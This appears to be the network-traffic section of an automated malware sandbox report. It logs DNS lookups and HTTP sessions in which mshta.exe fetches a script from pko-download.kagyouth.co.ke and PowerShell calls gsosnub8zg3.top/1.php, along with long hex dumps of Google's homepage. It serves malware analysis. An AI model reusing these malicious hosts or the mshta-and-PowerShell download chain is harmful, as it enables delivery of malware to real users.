                                                                                                                            Dec 17, 2024 16:30:26.543747902 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.571010113 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.571373940 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.571441889 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.574805021 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.609697104 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.609760046 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.610004902 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610645056 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610805988 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610852957 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.614629984 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.614690065 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.614725113 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.639349937 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.639410019 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.639422894 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.641200066 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.641333103 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.651524067 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.651822090 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.651887894 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.653516054 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.664081097 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.664206028 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.664351940 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.665831089 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.665888071 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.694449902 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.694772959 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.694830894 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.899672031 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.899842024 CET4974980192.168.2.4193.149.129.61

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 17, 2024 16:30:02.413388968 CET5137553192.168.2.41.1.1.1
                                                                                                                            Dec 17, 2024 16:30:03.403203011 CET5137553192.168.2.41.1.1.1
                                                                                                                            Dec 17, 2024 16:30:03.816036940 CET53513751.1.1.1192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:03.816080093 CET53513751.1.1.1192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:20.809909105 CET6070253192.168.2.41.1.1.1
                                                                                                                            Dec 17, 2024 16:30:21.226844072 CET53607021.1.1.1192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:22.956856966 CET5816653192.168.2.41.1.1.1
                                                                                                                            Dec 17, 2024 16:30:23.095576048 CET53581661.1.1.1192.168.2.4

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 17, 2024 16:30:02.413388968 CET192.168.2.41.1.1.10x4b9eStandard query (0)pko-download.kagyouth.co.keA (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:03.403203011 CET192.168.2.41.1.1.10x4b9eStandard query (0)pko-download.kagyouth.co.keA (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:20.809909105 CET192.168.2.41.1.1.10xbe92Standard query (0)gsosnub8zg3.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:22.956856966 CET192.168.2.41.1.1.10xfcf6Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 17, 2024 16:30:03.816036940 CET1.1.1.1192.168.2.40x4b9eNo error (0)pko-download.kagyouth.co.ke45.11.180.77A (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:03.816080093 CET1.1.1.1192.168.2.40x4b9eNo error (0)pko-download.kagyouth.co.ke45.11.180.77A (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:21.226844072 CET1.1.1.1192.168.2.40xbe92No error (0)gsosnub8zg3.top193.149.129.61A (IP address)IN (0x0001)false
                                                                                                                            Dec 17, 2024 16:30:23.095576048 CET1.1.1.1192.168.2.40xfcf6No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • pko-download.kagyouth.co.ke
                                                                                                                            • gsosnub8zg3.top
                                                                                                                            • www.google.com

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.449748193.149.129.61802800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 17, 2024 16:30:21.372582912 CET175OUTGET /1.php?s=mints21 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: gsosnub8zg3.top
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 17, 2024 16:30:22.955274105 CET166INHTTP/1.1 302 Found
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:22 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: keep-alive
                                                                                                                            Location: http://www.google.com


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.449749193.149.129.61803448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 17, 2024 16:30:21.372993946 CET175OUTGET /1.php?s=mints21 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: gsosnub8zg3.top
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 17, 2024 16:30:23.003590107 CET166INHTTP/1.1 302 Found
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:22 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: keep-alive
                                                                                                                            Location: http://www.google.com


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.449751172.217.19.228802800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 17, 2024 16:30:23.220895052 CET159OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: www.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 17, 2024 16:30:25.421638966 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:24 GMT
                                                                                                                            Expires: -1
                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-XJ_CfAakCtYFX1Upmfsayg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Server: gws
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Set-Cookie: AEC=AZ6Zc-W80guZF93e48HCGgSKyEAeCjEuzLYmHdik9fg9qjqfP7q60ZfnTDw; expires=Sun, 15-Jun-2025 15:30:24 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                            Set-Cookie: NID=520=TsAIgrZ03_MgW-pwIMH_spHIt6oMyeSWM1WCZ9eFUn_trfKXrd0X5Jc_XfYkn6xoHAYHnNJQ66pCnzdBQNaMkKCz1TV1xi3HQ5WMOkLJuFiaLtCkVzUNndUuz1B_88-ddUj__m4rC_t69crDT9tUWMGlUGHoT7YBONA1oI14tkKKkAbWykwmm0bEdNDRGqgzcr5xvfZD; expires=Wed, 18-Jun-2025 15:30:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Accept-Ranges: none
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Data Raw: 33 34 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                                            Data Ascii: 3416<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                                            Dec 17, 2024 16:30:25.421664000 CET224INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                                            Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"
                                                                                                                            Dec 17, 2024 16:30:25.421679020 CET1236INData Raw: 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 33 33 33 2d 6c 61 77 2e 67 69
                                                                                                                            Data Ascii: ><meta content="/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif" itemprop="image"><meta content="Seasonal Holidays 2024" property="twitter:title"><meta content="Happy Holidays! #GoogleDoodle" property="twitter:description">
                                                                                                                            Dec 17, 2024 16:30:25.421793938 CET1236INData Raw: 39 39 32 30 33 32 2c 32 38 34 32 34 38 35 2c 35 2c 39 31 2c 31 2c 31 2c 31 2c 31 2c 31 34 2c 36 34 2c 32 2c 34 2c 31 38 2c 32 32 2c 35 2c 33 2c 32 37 39 37 37 39 39 36 2c 32 35 32 32 32 37 35 32 2c 32 2c 31 32 39 31 2c 33 33 39 34 2c 31 32 34 32
                                                                                                                            Data Ascii: 992032,2842485,5,91,1,1,1,1,14,64,2,4,18,22,5,3,27977996,25222752,2,1291,3394,1242,16436,84045,19294,7,3321,885,6674,7606,8182,5933,43496,19011,2659,51,3384,3319,23878,9140,744,1,3,3851,328,4456,1769,23407,6,10211,686,7851,22,21982,1134,207,54
                                                                                                                            Dec 17, 2024 16:30:25.421809912 CET1236INData Raw: 31 2c 33 38 33 2c 35 39 38 35 30 36 36 2c 32 30 33 38 30 38 37 27 2c 6b 42 4c 3a 27 32 7a 59 65 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67
                                                                                                                            Data Ascii: 1,383,5985066,2038087',kBL:'2zYe',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;funct
                                                                                                                            Dec 17, 2024 16:30:25.421824932 CET1236INData Raw: 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67
                                                                                                                            Data Ascii: ogUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1});var e;(e=g
                                                                                                                            Dec 17, 2024 16:30:25.422122002 CET1236INData Raw: 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b
                                                                                                                            Data Ascii: Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z
                                                                                                                            Dec 17, 2024 16:30:25.422180891 CET1236INData Raw: 3a 30 7d 2e 67 62 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78
                                                                                                                            Data Ascii: :0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;
                                                                                                                            Dec 17, 2024 16:30:25.422204971 CET1236INData Raw: 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30
                                                                                                                            Data Ascii: t;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-b
                                                                                                                            Dec 17, 2024 16:30:25.422219038 CET1236INData Raw: 70 78 20 30 7d 2e 67 62 74 6f 20 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 35 70 78 20 31 70 78 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 31 70 78 7d 23 67 62 69 34 69 2c 23 67 62 69 34 69 64 7b
                                                                                                                            Data Ascii: px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position
                                                                                                                            Dec 17, 2024 16:30:25.541524887 CET1236INData Raw: 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2d 68 76
                                                                                                                            Data Ascii: ited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-hei


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.449752172.217.19.228803448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 17, 2024 16:30:23.221854925 CET159OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: www.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 17, 2024 16:30:26.082179070 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:25 GMT
                                                                                                                            Expires: -1
                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-40j4yE7fZSNVeecmNN-0tA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Server: gws
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Set-Cookie: AEC=AZ6Zc-XkC6wI06bu6yIaTIROvYW39kDJYLNRzR5gojyVddluagn81oHSdw; expires=Sun, 15-Jun-2025 15:30:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                            Set-Cookie: NID=520=i5jSMhcR4zKDvbX6ZPC55xcJiuDhs43Z7R1Hgwd_ZCMKbKHn-vbg-qk0K-p3CiFeNLnL0Vt8_nXLnVeaJuKnfM0teGuPllO68J7xxCgmzReN-HmOHcbqucJYCqt66X7WaKFnxQdvpLgP6FIOODwhtAtMM82r1O3DHs5RqnRyQ8y_C0vzaXva-YKrKiA2OFRlBizE76PFPA; expires=Wed, 18-Jun-2025 15:30:25 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Accept-Ranges: none
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Data Raw: 33 30 66 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
                                                                                                                            Data Ascii: 30fa<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                                            Dec 17, 2024 16:30:26.082300901 CET1236INData Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
                                                                                                                            Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/l
                                                                                                                            Dec 17, 2024 16:30:26.082339048 CET1236INData Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 45 5a 6c 68 5a 5f 48 6d 48 34 5f 4c 31 73 51 50 68 73 36 52 71 51 45 27 2c 6b 45 58 50 49 3a 27 30 2c 38 30 38 38 38 32 2c 32 38 39 31 34 30 31 2c 31 31 30 31 2c 35 33
                                                                                                                            Data Ascii: >(function(){var _g={kEI:'EZlhZ_HmH4_L1sQPhs6RqQE',kEXPI:'0,808882,2891401,1101,538661,2872,2891,73050,16105,78219,266577,45786,9779,99404,3801,2412,50869,7734,39348,1633,29278,27083,5213672,585,5992270,2842486,5,91,1,1,1,1,15,63,2,3,18,279780
                                                                                                                            Dec 17, 2024 16:30:26.082660913 CET1236INData Raw: 2c 36 2c 34 32 32 2c 34 32 34 2c 35 37 35 2c 31 35 32 2c 32 34 33 2c 33 32 2c 32 2c 38 34 2c 38 31 32 2c 35 32 37 2c 31 34 33 2c 32 30 30 2c 33 34 2c 37 34 39 2c 33 33 2c 31 30 39 2c 32 35 37 2c 33 34 35 2c 32 34 34 2c 31 38 33 2c 32 2c 33 39 2c
                                                                                                                            Data Ascii: ,6,422,424,575,152,243,32,2,84,812,527,143,200,34,749,33,109,257,345,244,183,2,39,252,65,13,361,375,119,173,1,7,3,5,150,175,1,81,495,201,932,365,313,136,204,200,1,327,552,336,1015,107,294,19,2340,20989241,359917,37198,18,2004,1480,875,4383,845
                                                                                                                            Dec 17, 2024 16:30:26.082695961 CET1236INData Raw: 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                            Data Ascii: )+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=fu
                                                                                                                            Dec 17, 2024 16:30:26.082730055 CET1236INData Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72
                                                                                                                            Data Ascii: document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(t
                                                                                                                            Dec 17, 2024 16:30:26.082767963 CET776INData Raw: 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64
                                                                                                                            Data Ascii: ebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:
                                                                                                                            Dec 17, 2024 16:30:26.082804918 CET1236INData Raw: 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67
                                                                                                                            Data Ascii: er-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none
                                                                                                                            Dec 17, 2024 16:30:26.083427906 CET1236INData Raw: 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67
                                                                                                                            Data Ascii: idth:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;widt
                                                                                                                            Dec 17, 2024 16:30:26.083467007 CET632INData Raw: 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70
                                                                                                                            Data Ascii: ne}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background
                                                                                                                            Dec 17, 2024 16:30:26.202224016 CET1236INData Raw: 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20
                                                                                                                            Data Ascii: y:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underl


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.44973045.11.180.774437356C:\Windows\SysWOW64\mshta.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-17 15:30:05 UTC344OUTGET /676198543e20a/js/676198543e135.js HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-CH
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-17 15:30:05 UTC277INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:05 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
